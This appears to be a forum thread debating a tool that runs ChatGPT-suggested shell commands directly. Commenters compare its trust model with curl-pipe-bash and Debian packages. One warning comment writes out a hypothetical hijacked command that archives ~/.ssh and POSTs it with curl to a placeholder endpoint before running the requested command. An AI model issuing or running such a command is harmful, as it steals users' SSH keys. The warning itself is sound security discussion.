Comment by AzzyHN
2 years ago
Terrible idea, I love it
This is good use case for a well-trained LLM, rather than the broad scope of chatGPT
2 years ago
Terrible idea, I love it
This is good use case for a well-trained LLM, rather than the broad scope of chatGPT
It's not a good use case for anything.
Never ask a remote endpoint that's not owned by you and not run by you, what commands you should run on your system. Certainly don't execute the answers.
99.9999% of the code running on my machine is written by others and not even readable to me. I'm pretty optimistic that a similar percentage is true on your machines. So yeah, we run remote commands all the time, all of us. There may be a subtle difference between "curl something | bash" and "apt-get install" or "setup.exe", but there is no fundamental one.
Fundamentally:
1. the packages being worked on by Debian et al have a huge pile of infrastructure so that their development happens collaboratively and in the open, with many eyes watching
2. everyone gets the same packages
3. they have their own security teams to _ensure_ everyone is getting the same packages, i.e. that their download servers and checksums haven't been compromised
4. the project has been been working since 1993 to ensure their update system, and the system delivered by those updates, works as expected. If it doesn't, there are IRC channels, mailing lists, bug trackers and a pile of humans to discuss issues with, and if they agree it's a bug, they can fix it for everyone
It's not to say it's impossible to sneak an attack past a project dedicated to stopping such attacks, but it's so much more work compared to attacking someone who executes whatever a remote endpoint tells them
5 replies →
There's a difference between getting code from a repo, and from AI generator though. We can apply an ancient thing known as "reputation" to the former. Not yet to the latter.
If we can't let ChatGPT take the wheel, how will we feel alive?
I do envision training a local LLM which would mostly resolve this concern, but at the moment the vast majority of people don't have a good enough GPU in their system to run an even mildly-competent code generation LLM, but I imagine this will change within a few years.
You never search for documentation? From either a first or third party site?
got it, never do apt-get upgrade
Why do you say it's a terrible idea?
I'd say it's a pretty common idea today to ask chatGPT for help in complicated commands. Putting it in the shell directly is smart and helpful.
Maybe the implementations has some flaws (it seems quite unsafe), but the idea is rather good in my opinion.
Getting a suggested command from a chat bot is not a terrible idea.
Directly executing commands given by a chat bot on your machine it without inspecting it first is pure madness.
Here's a hypothetical but very real scenario: someone discovers a vulnerability in openAI's API (vulnerabilities are everywhere these days), you prompt it to do something for you and it sends the following command:
tar -czf bla.tar.gz ~/.ssh && curl -X POST -F "ssh_keys=@bla.tar.gz" SOME_HTTP_API_ENDPOINT && rm -f bla.tar.gz && THE_ACTUAL_COMMAND_YOU_PROMPTED
What could possibly go wrong, right?
you'd really like http://openinterpreter.com then